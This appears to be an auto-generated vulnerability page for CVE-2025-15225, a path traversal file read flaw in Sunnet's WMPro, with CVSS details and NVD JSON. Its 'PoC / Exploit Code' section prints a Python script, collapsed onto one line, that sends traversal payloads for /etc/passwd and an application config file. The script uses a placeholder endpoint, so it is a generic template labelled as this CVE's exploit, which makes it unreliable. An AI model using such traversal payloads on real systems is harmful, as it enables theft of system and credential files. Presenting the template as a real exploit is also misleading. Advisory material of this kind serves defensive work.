Security Vulnerability Report
CVE-2025-15225 CVSS 7.5 HIGH

CVE-2025-15225

Published: 2025-12-29 07:15:56
Last Modified: 2025-12-31 20:55:14

Description

WMPro developed by Sunnet has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to read arbitrary system files.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sun.net:wmpro:*:*:*:*:*:*:*:* - VULNERABLE
WMPro all versions (prior to patch); the NVD configuration data in the raw JSON below narrows this to versions 5.0 through 5.2 inclusive.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-15225 PoC - WMPro Arbitrary File Read # Target: WMPro by Sunnet # Vulnerability: Relative Path Traversal leading to Arbitrary File Read def exploit_wmpro(target_url, file_path): """ Exploit arbitrary file read vulnerability in WMPro Args: target_url: Base URL of the vulnerable WMPro instance file_path: Path to the file to read (e.g., ../../../etc/passwd) """ # Construct the malicious URL with path traversal # Adjust the endpoint based on actual vulnerable path endpoint = "/[vulnerable_endpoint]" params = { "file": file_path } try: response = requests.get( target_url + endpoint, params=params, timeout=10 ) if response.status_code == 200: print(f"[+] Successfully read: {file_path}") print(response.text) else: print(f"[-] Failed to read file. Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error: {e}") # Example usage if __name__ == "__main__": target = "http://target.com" # Read system passwd file exploit_wmpro(target, "../../../etc/passwd") # Read configuration files exploit_wmpro(target, "../../../etc/hosts") # Read application config exploit_wmpro(target, "../../../var/www/html/config.php")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15225", "sourceIdentifier": "[email protected]", "published": "2025-12-29T07:15:56.333", "lastModified": "2025-12-31T20:55:14.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WMPro developed by Sunnet has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to read arbitrary system files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": 
[{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-23"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sun.net:wmpro:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndIncluding": "5.2", "matchCriteriaId": "CA602599-6AA9-4B68-98B6-5F95E47DAD0E"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10603-67149-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}